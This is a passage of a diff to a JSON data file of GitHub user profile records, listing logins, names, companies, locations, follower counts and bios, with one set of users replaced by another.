"https://avatars.githubusercontent.com/u/29195184?v=4", - "company": "Nordea", - "location": "Oulu", + "nest_created_at": "2024-09-22T08:39:54.976Z", + "nest_updated_at": "2024-09-22T19:24:38.642Z", + "name": "Eduardo Zamarrón", + "login": "Edu93Jer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61852327?v=4", + "company": "", + "location": "Mexico City", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 18, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-06-05T08:47:31Z", - "updated_at": "2024-05-20T07:41:47Z", - "node_id": "MDQ6VXNlcjI5MTk1MTg0", - "bio": "iOS lead developer for Nordea mobile apps", + "public_repositories_count": 64, + "created_at": "2020-03-05T22:46:14Z", + "updated_at": "2022-03-17T02:33:52Z", + "node_id": "MDQ6VXNlcjYxODUyMzI3", + "bio": "\"Helping people designing innovative \r\n software solutions.\"", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1813, + "pk": 7112, "fields": { - "nest_created_at": "2024-09-12T00:27:31.636Z", - "nest_updated_at": "2024-09-12T00:27:31.636Z", - "name": "Andrey Yegorov", - "login": "dlg99", + "nest_created_at": "2024-09-22T08:39:55.289Z", + "nest_updated_at": "2024-09-22T19:24:38.967Z", + "name": "Anton Sixtenson", + "login": "antonsixtenson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8622884?v=4", - "company": "Datastax", - "location": "Sammamish, WA", + "avatar_url": "https://avatars.githubusercontent.com/u/59032690?v=4", + "company": "", + "location": "Mjölby, Sweden", "collaborators_count": 0, "following_count": 0, - "followers_count": 18, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2014-09-02T04:09:15Z", - "updated_at": "2024-08-16T20:35:04Z", - "node_id": "MDQ6VXNlcjg2MjI4ODQ=", - "bio": "", + "public_repositories_count": 19, + "created_at": "2019-12-18T21:10:00Z", + "updated_at": "2024-07-20T07:34:23Z", + "node_id": "MDQ6VXNlcjU5MDMyNjkw", + "bio": "sixtensonanton@gmail.com", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1814, + "pk": 7113, "fields": { - "nest_created_at": "2024-09-12T00:27:32.826Z", - "nest_updated_at": "2024-09-12T00:27:32.826Z", - "name": "chetan jadhav", - "login": "chetan-2085", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/67169320?v=4", + "nest_created_at": "2024-09-22T08:39:55.605Z", + "nest_updated_at": "2024-09-22T19:24:39.314Z", + "name": "Adrián Moreno", + "login": "Monoradioactivo", + "email": "i13120427@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25640886?v=4", "company": "", - "location": "WA, USA", + "location": "Morelia, Michoacán, México", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2020-06-19T20:19:21Z", - "updated_at": "2023-07-20T17:49:02Z", - "node_id": "MDQ6VXNlcjY3MTY5MzIw", - "bio": "Application Security Engineer", - "is_hireable": false, + "following_count": 12, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2017-02-08T15:06:05Z", + "updated_at": "2024-09-10T15:51:23Z", + "node_id": "MDQ6VXNlcjI1NjQwODg2", + "bio": "Java Dev", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1815, + "pk": 7114, "fields": { - "nest_created_at": "2024-09-12T00:27:33.637Z", - "nest_updated_at": "2024-09-12T00:27:33.637Z", - "name": "", - "login": "crypticraven", + "nest_created_at": "2024-09-22T08:39:55.943Z", + "nest_updated_at": "2024-09-22T19:24:39.659Z", + "name": "Adquinson Farias", + "login": "dafarias", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33463678?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/15015274?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 4, + "followers_count": 4, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2017-11-07T18:27:45Z", - "updated_at": "2024-05-22T15:48:56Z", - "node_id": "MDQ6VXNlcjMzNDYzNjc4", + "created_at": "2015-10-07T13:20:47Z", + "updated_at": "2024-07-18T10:56:15Z", + "node_id": "MDQ6VXNlcjE1MDE1Mjc0", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1816, + "pk": 7115, "fields": { - "nest_created_at": "2024-09-12T00:27:34.918Z", - "nest_updated_at": "2024-09-12T00:27:43.129Z", - "name": "Lars", - "login": "Lars5678", + "nest_created_at": "2024-09-22T08:40:02.081Z", + "nest_updated_at": "2024-09-22T19:24:45.797Z", + "name": "star-r", + "login": "LiuXing-R", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57911568?v=4", - "company": "Hermes Einrichtungs Service", + "avatar_url": "https://avatars.githubusercontent.com/u/68625641?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-11-18T16:26:53Z", - "updated_at": "2024-08-16T12:04:06Z", - "node_id": "MDQ6VXNlcjU3OTExNTY4", + "public_repositories_count": 24, + "created_at": "2020-07-22T02:29:16Z", + "updated_at": "2021-12-13T09:31:10Z", + "node_id": "MDQ6VXNlcjY4NjI1NjQx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405653,24 +663802,24 @@ }, { "model": "github.user", - "pk": 1817, + "pk": 7116, "fields": { - "nest_created_at": "2024-09-12T00:27:36.135Z", - "nest_updated_at": "2024-09-12T00:27:36.135Z", + "nest_created_at": "2024-09-22T08:40:02.993Z", + "nest_updated_at": "2024-09-22T19:24:46.429Z", "name": "", - "login": "almacore", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76726755?v=4", + "login": "davidbarbrowatwork", + "email": "david.barbrow@sophos.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32772708?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-12-29T08:06:22Z", - "updated_at": "2022-02-03T11:54:42Z", - "node_id": "MDQ6VXNlcjc2NzI2NzU1", + "public_repositories_count": 2, + "created_at": "2017-10-13T14:07:23Z", + "updated_at": "2024-04-19T17:07:56Z", + "node_id": "MDQ6VXNlcjMyNzcyNzA4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405678,49 +663827,49 @@ }, { "model": "github.user", - "pk": 1818, + "pk": 7117, "fields": { - "nest_created_at": "2024-09-12T00:27:36.944Z", - "nest_updated_at": "2024-09-12T00:27:36.944Z", - "name": "", - "login": "pcoder47", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45415992?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:40:03.333Z", + "nest_updated_at": "2024-09-22T19:24:46.746Z", + "name": "RBRi", + "login": "rbri", + "email": "rbri@rbri.de", + "avatar_url": "https://avatars.githubusercontent.com/u/2544132?v=4", + "company": "@GEBIT", + "location": "Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 28, + "followers_count": 45, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-11-28T06:33:49Z", - "updated_at": "2024-06-20T10:32:56Z", - "node_id": "MDQ6VXNlcjQ1NDE1OTky", - "bio": "", + "public_repositories_count": 23, + "created_at": "2012-10-12T10:41:31Z", + "updated_at": "2024-09-20T08:31:26Z", + "node_id": "MDQ6VXNlcjI1NDQxMzI=", + "bio": "Passionate Software Architect, Designer, Developer and Tester", "is_hireable": false, - "twitter_username": "" + "twitter_username": "HtmlUnit" } }, { "model": "github.user", - "pk": 1819, + "pk": 7118, "fields": { - "nest_created_at": "2024-09-12T00:27:38.208Z", - "nest_updated_at": "2024-09-12T00:27:38.208Z", - "name": "Aaron Forster", - "login": "omadawn", - "email": "github@forstersfreehold.com", - "avatar_url": "https://avatars.githubusercontent.com/u/603925?v=4", - "company": "", - "location": "Washington", + "nest_created_at": "2024-09-22T08:40:03.976Z", + "nest_updated_at": "2024-09-22T19:24:47.406Z", + "name": "Code Hugger (Matthew Jones)", + "login": "jonespm", + "email": "jonespm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27447?v=4", + "company": "@tl-its-umich-edu ", + "location": "United States", "collaborators_count": 0, - "following_count": 8, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2011-02-07T01:02:57Z", - "updated_at": "2024-06-25T20:51:36Z", - "node_id": "MDQ6VXNlcjYwMzkyNQ==", + "following_count": 52, + "followers_count": 42, + "public_gists_count": 9, + "public_repositories_count": 115, + "created_at": "2008-10-03T18:12:01Z", + "updated_at": "2024-08-08T13:58:39Z", + "node_id": "MDQ6VXNlcjI3NDQ3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405728,74 +663877,49 @@ }, { "model": "github.user", - "pk": 1820, + "pk": 7119, "fields": { - "nest_created_at": "2024-09-12T00:27:40.659Z", - "nest_updated_at": "2024-09-12T00:27:40.659Z", - "name": "Marvin Brouwer", - "login": "Marvin-Brouwer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5499778?v=4", - "company": "", - "location": "Netherlands", + "nest_created_at": "2024-09-22T08:40:04.316Z", + "nest_updated_at": "2024-09-22T19:24:47.723Z", + "name": "Cory Forsyth", + "login": "bantic", + "email": "cory.forsyth@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2023?v=4", + "company": "@Addepar", + "location": "Brooklyn, NY", "collaborators_count": 0, - "following_count": 12, - "followers_count": 12, - "public_gists_count": 1, - "public_repositories_count": 26, - "created_at": "2013-09-20T07:06:52Z", - "updated_at": "2024-09-06T12:52:35Z", - "node_id": "MDQ6VXNlcjU0OTk3Nzg=", - "bio": "Moved some projects to Gitlab a while ago, if you're missing repositories on my profile here go check me out on gitlab.\r\nComing back to Github though", + "following_count": 9, + "followers_count": 164, + "public_gists_count": 117, + "public_repositories_count": 328, + "created_at": "2008-03-03T16:44:38Z", + "updated_at": "2024-09-03T11:39:51Z", + "node_id": "MDQ6VXNlcjIwMjM=", + "bio": "Currently Engineering @Addepar, formerly ran @201-Created", "is_hireable": false, - "twitter_username": "MarvinBrouwer" + "twitter_username": "bantic" } }, { "model": "github.user", - "pk": 1821, + "pk": 7120, "fields": { - "nest_created_at": "2024-09-12T00:27:44.440Z", - "nest_updated_at": "2024-09-12T00:27:44.440Z", - "name": "", - "login": "dr0ndv", + "nest_created_at": "2024-09-22T08:40:04.638Z", + "nest_updated_at": "2024-09-22T19:24:48.040Z", + "name": "Fabian Foerg", + "login": "faf0-addepar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14971280?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28877604?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-10-05T04:12:02Z", - "updated_at": "2022-11-02T13:54:07Z", - "node_id": "MDQ6VXNlcjE0OTcxMjgw", - "bio": "", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1822, - "fields": { - "nest_created_at": "2024-09-12T00:27:48.169Z", - "nest_updated_at": "2024-09-12T00:27:48.169Z", - "name": "Mariusz Sondecki", - "login": "sondemar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7047919?v=4", - "company": "Auto1", - "location": "Stettin", - "collaborators_count": 0, - "following_count": 10, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 70, - "created_at": "2014-03-24T14:16:42Z", - "updated_at": "2023-11-03T05:35:46Z", - "node_id": "MDQ6VXNlcjcwNDc5MTk=", + "public_repositories_count": 9, + "created_at": "2017-05-22T21:44:44Z", + "updated_at": "2024-05-24T15:18:08Z", + "node_id": "MDQ6VXNlcjI4ODc3NjA0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405803,49 +663927,49 @@ }, { "model": "github.user", - "pk": 1823, + "pk": 7121, "fields": { - "nest_created_at": "2024-09-12T00:27:50.606Z", - "nest_updated_at": "2024-09-12T00:27:50.606Z", - "name": "Armin Schrenk", - "login": "infeo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9036915?v=4", - "company": "@cryptomator @skymatic", - "location": "Germany", + "nest_created_at": "2024-09-22T08:40:05.287Z", + "nest_updated_at": "2024-09-22T19:24:48.725Z", + "name": "Ryan Whitworth", + "login": "rwhitworth", + "email": "me@ryanwhitworth.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7214365?v=4", + "company": "", + "location": "127.0.0.0/8", "collaborators_count": 0, "following_count": 8, - "followers_count": 37, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2014-10-06T14:01:15Z", - "updated_at": "2024-08-13T08:43:28Z", - "node_id": "MDQ6VXNlcjkwMzY5MTU=", - "bio": "Employee of @skymatic .\r\nPassionate Java-Fan", + "followers_count": 27, + "public_gists_count": 5, + "public_repositories_count": 31, + "created_at": "2014-04-07T19:41:30Z", + "updated_at": "2024-03-03T02:35:27Z", + "node_id": "MDQ6VXNlcjcyMTQzNjU=", + "bio": "I enjoy fuzzing software, writing ruby, writing perl, writing C#, creating docker environments, and writing snippets of C", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1824, + "pk": 7122, "fields": { - "nest_created_at": "2024-09-12T00:27:51.865Z", - "nest_updated_at": "2024-09-12T00:27:51.865Z", - "name": "Rong Dang", - "login": "DRong1121", - "email": "rongdang1121@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/20332907?v=4", + "nest_created_at": "2024-09-22T08:40:05.605Z", + "nest_updated_at": "2024-09-22T19:24:49.038Z", + "name": "", + "login": "tw-mcummings", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22508506?v=4", "company": "", - "location": "Belgium", + "location": "", "collaborators_count": 0, - "following_count": 3, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-07-07T06:07:46Z", - "updated_at": "2024-07-10T09:48:43Z", - "node_id": "MDQ6VXNlcjIwMzMyOTA3", + "public_repositories_count": 1, + "created_at": "2016-09-28T21:49:06Z", + "updated_at": "2024-08-03T13:51:51Z", + "node_id": "MDQ6VXNlcjIyNTA4NTA2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405853,74 +663977,74 @@ }, { "model": "github.user", - "pk": 1825, + "pk": 7123, "fields": { - "nest_created_at": "2024-09-12T00:27:52.272Z", - "nest_updated_at": "2024-09-12T00:27:52.272Z", - "name": "Mehmet Tahir Dede", - "login": "JustMehmet", + "nest_created_at": "2024-09-22T08:40:05.925Z", + "nest_updated_at": "2024-09-22T19:24:49.401Z", + "name": "", + "login": "vivekchsm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/105645217?v=4", - "company": "HMCTS", - "location": "Maidenhead, UK", + "avatar_url": "https://avatars.githubusercontent.com/u/2463247?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-05-16T11:46:53Z", - "updated_at": "2024-08-29T14:01:37Z", - "node_id": "U_kgDOBkwEoQ", - "bio": "Senior Developer", + "public_repositories_count": 3, + "created_at": "2012-10-01T12:08:43Z", + "updated_at": "2023-04-21T10:26:42Z", + "node_id": "MDQ6VXNlcjI0NjMyNDc=", + "bio": "", "is_hireable": false, - "twitter_username": "tdmehmet" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1826, + "pk": 7124, "fields": { - "nest_created_at": "2024-09-12T00:27:53.518Z", - "nest_updated_at": "2024-09-12T00:27:53.518Z", - "name": "", - "login": "ryandutton", + "nest_created_at": "2024-09-22T08:40:41.911Z", + "nest_updated_at": "2024-09-22T19:25:25.274Z", + "name": "Michael Messner", + "login": "m-1-k-3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72393782?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/497520?v=4", "company": "", - "location": "", + "location": "Munich", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2020-10-05T12:58:47Z", - "updated_at": "2024-08-01T09:51:24Z", - "node_id": "MDQ6VXNlcjcyMzkzNzgy", + "following_count": 18, + "followers_count": 86, + "public_gists_count": 6, + "public_repositories_count": 37, + "created_at": "2010-11-26T07:47:55Z", + "updated_at": "2024-08-19T19:36:02Z", + "node_id": "MDQ6VXNlcjQ5NzUyMA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "s3cur1ty_de" } }, { "model": "github.user", - "pk": 1827, + "pk": 7125, "fields": { - "nest_created_at": "2024-09-12T00:27:54.726Z", - "nest_updated_at": "2024-09-12T00:27:54.726Z", - "name": "Matthew Condell", - "login": "mcondellva", + "nest_created_at": "2024-09-22T08:40:42.223Z", + "nest_updated_at": "2024-09-22T19:25:25.592Z", + "name": "M2ayill", + "login": "M2ayill", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87145733?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22850233?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-07-08T17:53:45Z", - "updated_at": "2024-06-11T13:37:37Z", - "node_id": "MDQ6VXNlcjg3MTQ1NzMz", + "public_repositories_count": 2, + "created_at": "2016-10-15T05:06:19Z", + "updated_at": "2021-09-15T15:44:09Z", + "node_id": "MDQ6VXNlcjIyODUwMjMz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -405928,124 +664052,124 @@ }, { "model": "github.user", - "pk": 1828, + "pk": 7126, "fields": { - "nest_created_at": "2024-09-12T00:27:56.341Z", - "nest_updated_at": "2024-09-12T00:27:56.341Z", - "name": "Olivier Lefebvre", - "login": "aguacongas", - "email": "aguacongas@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3294829?v=4", - "company": "Aguafrommars, SIEN", - "location": "Neuchâtel, Switzerland", + "nest_created_at": "2024-09-22T08:40:42.887Z", + "nest_updated_at": "2024-09-22T19:25:26.240Z", + "name": "Pascal Eckmann", + "login": "p4cx", + "email": "p4cx@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/17053360?v=4", + "company": "", + "location": "Munich", "collaborators_count": 0, - "following_count": 29, - "followers_count": 37, - "public_gists_count": 4, - "public_repositories_count": 23, - "created_at": "2013-01-17T09:54:41Z", - "updated_at": "2024-08-22T11:28:50Z", - "node_id": "MDQ6VXNlcjMyOTQ4Mjk=", - "bio": "I'm good at developing software with C#, TypeScript and Javascript. \r\nI'm good at integrating tools in a CI/CD chain. ", - "is_hireable": true, + "following_count": 6, + "followers_count": 21, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2016-02-03T20:26:53Z", + "updated_at": "2024-08-24T09:11:05Z", + "node_id": "MDQ6VXNlcjE3MDUzMzYw", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1829, + "pk": 7127, "fields": { - "nest_created_at": "2024-09-12T00:27:57.572Z", - "nest_updated_at": "2024-09-12T00:27:57.572Z", - "name": "Martin Tomašovič", - "login": "McMlok", + "nest_created_at": "2024-09-22T08:41:03.431Z", + "nest_updated_at": "2024-09-22T19:26:04.927Z", + "name": "SheHacksPurple", + "login": "shehackspurple", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15009530?v=4", - "company": "KB", - "location": "Prague", + "avatar_url": "https://avatars.githubusercontent.com/u/26744843?v=4", + "company": "SheHacksPurple.ca", + "location": "Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 17, - "created_at": "2015-10-07T06:09:17Z", - "updated_at": "2024-07-12T13:08:35Z", - "node_id": "MDQ6VXNlcjE1MDA5NTMw", - "bio": "", + "following_count": 6, + "followers_count": 175, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2017-03-28T15:23:16Z", + "updated_at": "2024-09-04T21:42:27Z", + "node_id": "MDQ6VXNlcjI2NzQ0ODQz", + "bio": "AppSec, DevSecOps, Cloud Security\r\nTraining, Coaching and Knowledge Sharing!", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1830, + "pk": 7128, "fields": { - "nest_created_at": "2024-09-12T00:27:58.781Z", - "nest_updated_at": "2024-09-12T00:27:58.781Z", + "nest_created_at": "2024-09-22T08:41:03.743Z", + "nest_updated_at": "2024-09-22T19:25:46.993Z", "name": "", - "login": "jpcmonster", + "login": "AbelSquidHeadReady2019", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51028652?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47616378?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-05-25T16:21:48Z", - "updated_at": "2024-02-14T14:11:41Z", - "node_id": "MDQ6VXNlcjUxMDI4NjUy", - "bio": "just someone somewhere in Canada. :P", + "public_repositories_count": 4, + "created_at": "2019-02-14T00:48:26Z", + "updated_at": "2024-09-15T11:48:58Z", + "node_id": "MDQ6VXNlcjQ3NjE2Mzc4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1831, + "pk": 7129, "fields": { - "nest_created_at": "2024-09-12T00:27:59.608Z", - "nest_updated_at": "2024-09-12T00:27:59.608Z", - "name": "Narayana R", - "login": "rnarayana", + "nest_created_at": "2024-09-22T08:41:04.065Z", + "nest_updated_at": "2024-09-22T19:25:47.309Z", + "name": "Carl-Hugo Marcotte", + "login": "Carl-Hugo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/203111?v=4", - "company": "Optym", - "location": "Bangalore", + "avatar_url": "https://avatars.githubusercontent.com/u/5885505?v=4", + "company": "", + "location": "Ottawa", "collaborators_count": 0, - "following_count": 2, - "followers_count": 7, - "public_gists_count": 9, - "public_repositories_count": 9, - "created_at": "2010-02-13T17:12:41Z", - "updated_at": "2024-09-06T14:59:25Z", - "node_id": "MDQ6VXNlcjIwMzExMQ==", - "bio": "", - "is_hireable": false, - "twitter_username": "rnarayana" + "following_count": 0, + "followers_count": 97, + "public_gists_count": 4, + "public_repositories_count": 51, + "created_at": "2013-11-08T04:53:15Z", + "updated_at": "2024-09-14T11:29:59Z", + "node_id": "MDQ6VXNlcjU4ODU1MDU=", + "bio": "Author of Architecting ASP.NET Core Applications: An Atypical Design Patterns Guide | Software Craftsman | ASP.NET Core | C# | Architect | AI", + "is_hireable": true, + "twitter_username": "CarlHugoM" } }, { "model": "github.user", - "pk": 1832, + "pk": 7130, "fields": { - "nest_created_at": "2024-09-12T00:28:00.856Z", - "nest_updated_at": "2024-09-12T00:28:00.856Z", + "nest_created_at": "2024-09-22T08:41:04.714Z", + "nest_updated_at": "2024-09-22T19:25:47.939Z", "name": "", - "login": "31deR", + "login": "abelsquidhead", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60350660?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13805180?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 156, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-01-27T13:45:13Z", - "updated_at": "2023-09-07T13:02:24Z", - "node_id": "MDQ6VXNlcjYwMzUwNjYw", + "public_repositories_count": 91, + "created_at": "2015-08-15T02:26:00Z", + "updated_at": "2022-12-19T18:02:53Z", + "node_id": "MDQ6VXNlcjEzODA1MTgw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406053,74 +664177,49 @@ }, { "model": "github.user", - "pk": 1833, + "pk": 7131, "fields": { - "nest_created_at": "2024-09-12T00:28:02.047Z", - "nest_updated_at": "2024-09-12T00:28:02.047Z", - "name": "", - "login": "profTwinglings", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25454662?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:41:22.234Z", + "nest_updated_at": "2024-09-22T19:26:05.299Z", + "name": "anatol", + "login": "rielas", + "email": "anatol1988@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/566171?v=4", + "company": "Neuralegion", + "location": "Kraków, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 23, + "followers_count": 13, "public_gists_count": 3, - "public_repositories_count": 1, - "created_at": "2017-01-31T10:48:24Z", - "updated_at": "2023-12-14T08:46:09Z", - "node_id": "MDQ6VXNlcjI1NDU0NjYy", - "bio": "", - "is_hireable": false, + "public_repositories_count": 29, + "created_at": "2011-01-15T12:32:29Z", + "updated_at": "2024-09-18T16:12:22Z", + "node_id": "MDQ6VXNlcjU2NjE3MQ==", + "bio": "Lumpendeveloper", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1834, + "pk": 7132, "fields": { - "nest_created_at": "2024-09-12T00:28:03.674Z", - "nest_updated_at": "2024-09-12T00:28:03.674Z", - "name": "Remus Dugheanu", - "login": "robingood", + "nest_created_at": "2024-09-22T08:41:42.001Z", + "nest_updated_at": "2024-09-22T19:41:54.212Z", + "name": "Stephan", + "login": "s-spindler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1123371?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25225092?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2011-10-12T18:52:06Z", - "updated_at": "2024-03-01T10:02:38Z", - "node_id": "MDQ6VXNlcjExMjMzNzE=", - "bio": "", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1835, - "fields": { - "nest_created_at": "2024-09-12T00:28:04.884Z", - "nest_updated_at": "2024-09-12T00:28:04.884Z", - "name": "Bernhard Haumacher", - "login": "haumacher", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5607145?v=4", - "company": "@top-logic ", - "location": "Germany", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 18, - "public_gists_count": 2, - "public_repositories_count": 63, - "created_at": "2013-10-03T22:11:00Z", - "updated_at": "2024-02-18T07:01:48Z", - "node_id": "MDQ6VXNlcjU2MDcxNDU=", + "following_count": 26, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2017-01-19T13:44:08Z", + "updated_at": "2024-09-22T13:04:38Z", + "node_id": "MDQ6VXNlcjI1MjI1MDky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406128,99 +664227,99 @@ }, { "model": "github.user", - "pk": 1836, + "pk": 7133, "fields": { - "nest_created_at": "2024-09-12T00:28:07.384Z", - "nest_updated_at": "2024-09-12T00:28:07.384Z", + "nest_created_at": "2024-09-22T08:41:42.635Z", + "nest_updated_at": "2024-09-22T19:26:25.359Z", "name": "", - "login": "octavioricci", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13836158?v=4", + "login": "dcfSec", + "email": "contributor@dcfsec.com", + "avatar_url": "https://avatars.githubusercontent.com/u/72668611?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2015-08-17T15:47:43Z", - "updated_at": "2024-09-05T00:12:13Z", - "node_id": "MDQ6VXNlcjEzODM2MTU4", + "public_repositories_count": 8, + "created_at": "2020-10-10T18:43:52Z", + "updated_at": "2024-05-28T05:47:26Z", + "node_id": "MDQ6VXNlcjcyNjY4NjEx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "dcfSec" } }, { "model": "github.user", - "pk": 1837, + "pk": 7134, "fields": { - "nest_created_at": "2024-09-12T00:28:08.643Z", - "nest_updated_at": "2024-09-12T00:28:08.643Z", - "name": "", - "login": "SkippedTurn", + "nest_created_at": "2024-09-22T08:41:50.136Z", + "nest_updated_at": "2024-09-22T19:26:33.008Z", + "name": "secureCodeBox Bot", + "login": "secureCodeBoxBot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33953480?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84071981?v=4", + "company": "@secureCodeBox", + "location": "Internet", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-11-24T09:10:51Z", - "updated_at": "2022-12-01T14:23:35Z", - "node_id": "MDQ6VXNlcjMzOTUzNDgw", - "bio": "", + "public_repositories_count": 0, + "created_at": "2021-05-12T09:13:34Z", + "updated_at": "2024-08-09T13:22:15Z", + "node_id": "MDQ6VXNlcjg0MDcxOTgx", + "bio": "I'm just a bot.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "securecodebox" } }, { "model": "github.user", - "pk": 1838, + "pk": 7135, "fields": { - "nest_created_at": "2024-09-12T00:28:10.244Z", - "nest_updated_at": "2024-09-12T00:28:10.244Z", - "name": "", - "login": "JosselinDuhamel", + "nest_created_at": "2024-09-22T08:41:51.727Z", + "nest_updated_at": "2024-09-22T19:26:34.581Z", + "name": "Johannes Zahn", + "login": "JohannesZahn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49819620?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28805778?v=4", + "company": "@secureCodeBox ", "location": "", "collaborators_count": 0, - "following_count": 